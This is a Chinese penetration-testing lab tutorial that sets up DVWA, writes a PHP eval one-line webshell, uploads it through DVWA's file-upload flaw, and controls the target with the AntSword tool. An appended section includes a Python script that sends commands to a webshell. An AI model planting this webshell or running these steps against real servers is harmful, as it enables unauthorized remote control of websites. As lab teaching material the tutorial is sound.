渗透测试环境搭建与工具“中国蚁剑”的使用

本文详细讲述了如何在Windows10环境下,通过蚁剑工具连接并控制靶机,利用DVWA文件上传漏洞上传PHP木马(Webshell),实现远程操作。从搭建环境、创建Webshell到利用蚁剑进行虚拟终端、文件操作和数据库管理,全面展示了渗透测试过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此资料仅供学习参考,请勿用于非法用途,违者一律承担所有风险

操作机: Windows 10 (安装中国蚁剑)
靶机: Windows 10(安装PhpStudy DVWA,关闭防火墙)ip:192.168.31.131

下载安装包

中国蚁剑:https://pan.baidu.com/s/1V1lvTrArX6lv62Azcegt5w
PhpStudy:https://pan.baidu.com/s/1mW33EQ1MTqU32CQ0LTBlwQ
DVWA:https://pan.baidu.com/s/1We5nieSDi0vQ4aASxsK6Fw

提取码:co6e

实验原理

(1)关于Webshell
Webshell是以ASP、PHP、JSP或者CGI等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
Webshell使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

(2)关于中国蚁剑
蚁剑是一个开放源代码、跨平台的Webshell管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。

实验步骤

1、搭建渗透环境
将PhpStudy、DVWA下载到靶机并解压到相应位置,这里我都解压到桌面

双击PhpStudy2018.exe文件,我选择安装在C盘在这里插入图片描述

等待自解压完成
在这里插入图片描述

PhpStudt已经安装完成
在这里插入图片描述

点击其他选项菜单,先退出PhpStudy
在这里插入图片描述

双击解压后的DVWA文件夹,把里面的DVWA-master文件夹剪贴在安装PhpStudy文件夹下的PHPTutorial/WWW里
在这里插入图片描述

进入DVWA-master/config,把config.inc.php.dist文件改为config.inc.php(删除.dist后缀)然后右键以记事本方式打开此文件
在这里插入图片描述

将config.inc.php文件中MySQL数据库的连接用户名由“dvwa”修改为“root”、密码由“p@ssw0rd”修改为“root”,保存并退出
在这里插入图片描述

接下来启动PhpStudy,双击然后点击启动
在这里插入图片描述
在这里插入图片描述

测试一下环境是否搭建成功,在浏览器中输入http://本地ip/DVWA-master
在这里插入图片描述这样渗透环境已经搭建成功

2、写PHP一句话木马(Webshell)
在操作机桌面新建一个文本文档并更名为muma.php
在这里插入图片描述
在这里插入图片描述

鼠标右键单击muma.php,以记事本的方式打开,在文件中输入以下代码并保存:

<?php @eval($_POST['123456']); ?>

在这里插入图片描述

3、利用靶机的文件上传漏洞,将此木马文件(Webshell)上传至靶机

(1)在操作机上启动浏览器,在地址栏中输入以下URL访问靶机上的DVWA网站(如不是登录界面,滑至页面底端,点击Create/Reset Database按钮)

http://[靶机IP]/DVWA-master

在这里插入图片描述
在这里插入图片描述

(2)成功登录DVWA网站后,在网站主页左侧菜单选择DVWA Security,将网站的安全级别设置为“Low”

在这里插入图片描述

(3)在DVWA网站主页左侧菜单选择“File upload”进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径
在这里插入图片描述

4、利用“中国蚁剑”连接靶机上的muma.php
(1)在操作机上把下载好的蚁剑安装包解压在桌面,进入桌面文件夹AntSword/AntSword-Loader-v4.0.3-win32-x64,鼠标左键双击“AntSword.exe”程序,运行“中国蚁剑”
在这里插入图片描述
在这里插入图片描述

初次运行“中国蚁剑”时,需要初始化。点击“中国蚁剑”主界面的“初始化”按钮,将桌面AntSword/antSword-master指定为“中国蚁剑”的工作目录
在这里插入图片描述

指定完成后,界面会提示手动重启蚁剑程序。可再次进入桌面文件夹/AntSword/AntSword-Loader-v4.0.3-win32-x64,运行“AntSword.exe”程序
在这里插入图片描述

(2)在“中国蚁剑”主界面空白处单击鼠标右键,在弹出的菜单中选择“添加数据”
在这里插入图片描述

添加一条Webshell管理项:

URL地址:http://[靶机IP]/DVWA-master/hackable/uploads/muma.php
连接密码:123456
连接类型:PHP

在这里插入图片描述

设置完成后点击左上角的“添加”按钮,会看到主界面多了一条Webshell管理项
在这里插入图片描述

5、利用“中国蚁剑”对靶机进行虚拟终端及文件操作
(1)虚拟终端操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“虚拟终端”
在这里插入图片描述
打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令(如whoami、id、netstat -an等)
在这里插入图片描述

(2)文件操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“文件管理”
在这里插入图片描述
在这里插入图片描述

打开文件管理界面后,可以像操作本地机器一样,对靶机系统进行一些操作(如上传文件、下载文件、修改文件属性等)
在这里插入图片描述

(3)数据操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“数据操作”
在这里插入图片描述

打开文件管理界面后,可以对靶机上的数据库系统进行一些操作
在这里插入图片描述实验到此结束。

### 关于中国 (AntSword) 的使用教程 #### 安装过程 中国是一款开源的跨平台 Webshell 管理工具,适用于合法授权的安全测试人员和网站管理员。其安装过程相对简单,支持 Windows、Linux 和 macOS 平台。 1. **下载文件**: 需要分别下载项目核心源码 (`antSword`) 和加载器 (`loader`)[^4]。加载器提供了不同操作系统对应的版本。 2. **解压并运行**: 将 `AntSword-Loader-vX.X.X-os-version.zip` 解压缩到目标目录后,双击可执行文件(如 `AntSword.exe`),等待初始化完成后再重新启动程序即可正常使用[^4]。 --- #### 基本配置连接设置 在成功安装之后,可以通过以下步骤创建一个新的会话来管理远程服务器上的 Webshell: 1. 打开软件界面,在左侧导航栏点击“新建站点”按钮。 2. 输入目标 URL 地址以及上传路径等相关参数。例如: - **URL**: http://example.com/shell.php - **密码**: 如果存在加密机制,则需填写正确的密钥或密码。 3. 设置编码方式和其他高级选项(如果必要的话)[^3]。 --- #### 功能模块介绍 中国不仅提供基本的命令执行功能,还集成了许多实用特性以增强用户体验: - 文件管理:允许浏览、编辑甚至删除远端主机中的任意文件; - 数据库交互:能够直接查询 MySQL 或其他类型的数据库表单数据; - 终端模拟器:内置 SSH/Telnet 支持以便更高效地控制 Linux 服务端实例; - 插件扩展:通过第三方插件进一步扩充应用范围[^2]。 以下是实现某些特定任务时可能需要用到的一些 Python 脚本片段作为示例展示如何调用 API 接口自动化处理流程的一部分逻辑代码: ```python import requests def send_command(url, password, command): payload = {'password': password, 'cmd': command} response = requests.post(url, data=payload) return response.text if __name__ == "__main__": url = "http://target-site/web-shell-path" passwd = "your-webshell-password" cmd = "whoami" result = send_command(url, passwd, cmd) print(result.strip()) ``` 此脚本发送 POST 请求给指定的目标地址,并附带所需的身份验证凭据及待执行的具体指令字符串内容[^1]。 --- #### 注意事项 尽管该工具有助于提高工作效率,但在未经授权的情况下擅自访问他人计算机系统属于违法行为,请务必遵循当地法律法规合理运用此类技术手段[^2]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kicock.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值